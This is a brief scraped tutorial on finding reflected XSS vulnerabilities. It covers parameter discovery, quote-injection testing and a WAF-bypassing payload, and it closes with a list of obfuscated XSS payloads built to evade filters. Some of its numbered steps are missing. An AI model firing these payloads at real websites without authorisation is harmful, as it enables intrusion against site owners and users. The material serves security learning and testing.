.png)
1 day ago
10 BOOK THIS SPACE FOR AD
ARTICLE AD
Disclaimer:
The guidelines in this article are provided for educational purposes and to raise awareness about cybersecurity. The author is not responsible for any use of the information that violates the law or harms others.
In this tutorial, I will provide step-by-step instructions on how to find an Cross Site Scripting(XSS) Vulnerability (Reflected XSS).
First, we need to search for parameters on a website. To find parameters on a website, tools like Paramspider and Arjun can be used.However, another way to find parameters on a target website is by using Google Dorking techniques.After finding parameters on a website, insert an additional character like a single quote (‘) at the end of the value in the parameter. If an error is displayed, it could indicate a vulnerability.
3. Then, I tried injecting other SQL Injection payloads, but they were blocked by the WAF.
4. Next, I attempted to inject an XSS payload using: “‘`//><Svg+Only%3d1+OnLoad%3dconfirm(atob(“MQ==”))>, and it successfully bypassed the WAF and triggered a popup alert.
So, the tutorial above explains an easy way to find an Cross Site Scripting(XSS) Vulnerability (Reflected XSS).
Other XSS payloads that can be used:
“\/><img%20s+src+c=x%20on+onerror+%20=”alert(1)”\>
JavaScript://%250Aalert?.(1)//
“\/><sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
“>’><details/open/ontoggle=confirm(‘XSS’)>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
‘%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
“\/><svg onmouseover=”confirm(document.domain)
“\/><sVg OnPointerEnter=”location=javas+cript:ale+rt%2+81%2+9;//</div”>
Bengali (Bangladesh) · 
English (United States) ·